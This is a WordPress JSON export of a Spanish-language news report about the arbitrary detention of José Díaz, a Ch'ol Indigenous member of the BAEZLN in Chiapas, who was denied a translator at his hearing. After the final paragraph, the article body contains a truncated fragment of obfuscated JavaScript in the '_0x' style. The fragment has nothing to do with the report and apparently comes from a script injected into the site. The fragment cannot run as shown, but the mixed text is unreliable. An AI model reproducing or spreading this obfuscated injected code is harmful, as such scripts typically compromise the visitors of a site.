{"id":16267,"date":"2024-06-22T02:59:00","date_gmt":"2024-06-22T02:59:00","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16267"},"modified":"2024-06-22T02:59:01","modified_gmt":"2024-06-22T02:59:01","slug":"denuncian-violaciones-de-derechos-humanos-contra-miembro-del-baezln","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16267","title":{"rendered":"Denuncian Violaciones de Derechos Humanos contra miembro del BAEZLN"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/WhatsApp-Image-2024-06-21-at-1.29.01-PM-1024x1024.jpeg\" alt=\"\" class=\"wp-image-16268\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/WhatsApp-Image-2024-06-21-at-1.29.01-PM-1024x1024.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/WhatsApp-Image-2024-06-21-at-1.29.01-PM-300x300.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/WhatsApp-Image-2024-06-21-at-1.29.01-PM-150x150.jpeg 150w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/WhatsApp-Image-2024-06-21-at-1.29.01-PM-768x768.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/WhatsApp-Image-2024-06-21-at-1.29.01-PM.jpeg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>21 de junio del 2024. San Crist\u00f3bal de Las Casas.- Jos\u00e9 D\u00edaz, ind\u00edgena Cho&#8217;l y miembro del BAEZLN, contin\u00faa en situaci\u00f3n de detenci\u00f3n arbitraria y se encuentra como reh\u00e9n del Estado. Seg\u00fan informaci\u00f3n del Grupo de Trabajo No Estamos Todos No Estamos Todas, el 19 de junio, se iba a celebrar la audiencia de continuidad de su proceso penal de criminalizaci\u00f3n.<\/p>\n\n\n\n<p>Sin embargo, el Juez de Catazaj\u00e1 no garantiz\u00f3 el acceso de D\u00edaz a un traductor en su lengua materna, lo que constituye una violaci\u00f3n de los derechos humanos seg\u00fan el sistema penal acusatorio.<\/p>\n\n\n\n<p>En un comunicado, informaron que la detenci\u00f3n arbitraria de Jos\u00e9 D\u00edaz y la falta de un traductor en su lengua materna son graves violaciones de sus derechos humanos. \u201cEstas acciones vulneran el derecho a un debido proceso y a una defensa adecuada, reflejando un patr\u00f3n de discriminaci\u00f3n sistem\u00e1tica hacia las comunidades ind\u00edgenas. Las barreras en el sistema judicial limitan su acceso a la justicia, perpetuando una situaci\u00f3n de desigualdad\u201d.<\/p>\n\n\n\n<p>\u201cLa detenci\u00f3n de D\u00edaz es vista como un acto de criminalizaci\u00f3n de su identidad ind\u00edgena y de su participaci\u00f3n en movimientos sociales como el BAEZLN. Este tipo de criminalizaci\u00f3n no s\u00f3lo afecta a defensores de derechos humanos a nivel personal, sino que tambi\u00e9n impacta negativamente a toda su comunidad, socavando la defensa de sus derechos colectivos\u201d, se\u00f1alan.<\/p>\n\n\n\n<p>Y es que aseguran que el hecho de que no se le haya proporcionado un int\u00e9rprete en su lengua materna durante el proceso penal contraviene las normas internacionales de derechos humanos. Adem\u00e1s, impide que D\u00edaz pueda entender adecuadamente las acusaciones en su contra y participar de manera efectiva en su propia defensa.<\/p>\n\n\n\n<p>Esto demuestra una falta de sensibilidad cultural y ling\u00fc\u00edstica por parte del sistema judicial, que deber\u00eda garantizar la igualdad de acceso a la justicia para todas las personas, independientemente de su origen \u00e9tnico o cultural.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 21 de junio del 2024. San Crist\u00f3bal de Las Casas.- Jos\u00e9 D\u00edaz, ind\u00edgena Cho&#8217;l y miembro del BAEZLN, contin\u00faa en situaci\u00f3n de detenci\u00f3n arbitraria y se encuentra como reh\u00e9n del Estado. Seg\u00fan informaci\u00f3n del Grupo de Trabajo No Estamos Todos No Estamos Todas, el 19 de junio, se iba a celebrar la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16268,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-16267","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16267","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16267"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16267\/revisions"}],"predecessor-version":[{"id":16269,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16267\/revisions\/16269"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16268"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16267"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16267"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16267"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}